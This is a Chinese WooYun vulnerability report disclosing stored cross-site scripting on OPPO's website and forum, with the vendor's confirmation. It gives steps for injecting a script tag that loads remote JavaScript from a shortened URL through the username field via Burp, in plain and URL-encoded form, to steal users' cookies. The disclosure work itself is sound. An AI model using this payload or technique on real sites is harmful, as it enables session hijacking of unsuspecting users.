当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117910

漏洞标题:OPPO官网及论坛存在跨站,指哪打哪获取cookie

相关厂商:广东欧珀移动通讯有限公司

漏洞作者: 高小厨

提交时间:2015-06-03 11:06

修复时间:2015-07-20 10:28

公开时间:2015-07-20 10:28

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-05: 厂商已经确认,细节仅向厂商公开
2015-06-15: 细节向核心白帽子及相关领域专家公开
2015-06-25: 细节向普通白帽子公开
2015-07-05: 细节向实习白帽子公开
2015-07-20: 细节向公众公开

简要描述:

前几天使用Looke马甲曝了一个OPPO任意用户登录,然后OPPO官方说今后后会有相应奖励
所以,你猜对了
我是冲着奖励来的

详细说明:

1、自己先注册个账户,先不要更改自己的用户名,因为只能改一次
2、更改自己的用户名,随便写一个用户名骗过本地校验,使用burp拦截发送的数据包
3、使用burp的Decoder功能将跨站代码进行URL编码

<script src=http://is.gd/NdugCE></script>


编码后的代码:

%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%69%73%2e%67%64%2f%4e%64%75%67%43%45%3e%3c%2f%73%63%72%69%70%74%3e


4、将数据包中的username的数据改成url编码后的跨站代码
5、保存修改,然后登陆官网或者论坛
6、可以发帖,可以加其他人好友,可以私信,可以回复帖子等操作,盗取任意账户cookie

漏洞证明:

1、自己先注册个账户,先不要更改自己的用户名,因为只能改一次
2、更改自己的用户名,随便写一个用户名骗过本地校验,使用burp拦截发送的数据包

15.png


3、使用burp的Decoder功能将跨站代码进行URL编码

<script src=http://is.gd/NdugCE></script>


编码后的代码:

%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%69%73%2e%67%64%2f%4e%64%75%67%43%45%3e%3c%2f%73%63%72%69%70%74%3e


4、将数据包中的username的数据改成url编码后的跨站代码

14.png

16.png


5、保存修改,然后登陆官网或者论坛,改完后,用户名处显示空白

17.png


6、可以发帖,可以加其他人好友,可以私信,可以回复帖子等操作,盗取任意账户cookie

19.png

修复方案:

OPPO发个小奖品吧

版权声明:转载请注明来源 高小厨@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-05 10:26

厂商回复:

小伙伴真着急,相关的奖励流程公司还在审核中,等完成之后一定补给你,
我记住你了
我记住你了
我记住你了

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-03 12:17 | 高小厨 ( 普通白帽子 | Rank:814 漏洞数:74 | 不会吹牛的小二不是好厨子!)

    忘记打码了,审核员记得帮我打码,谢谢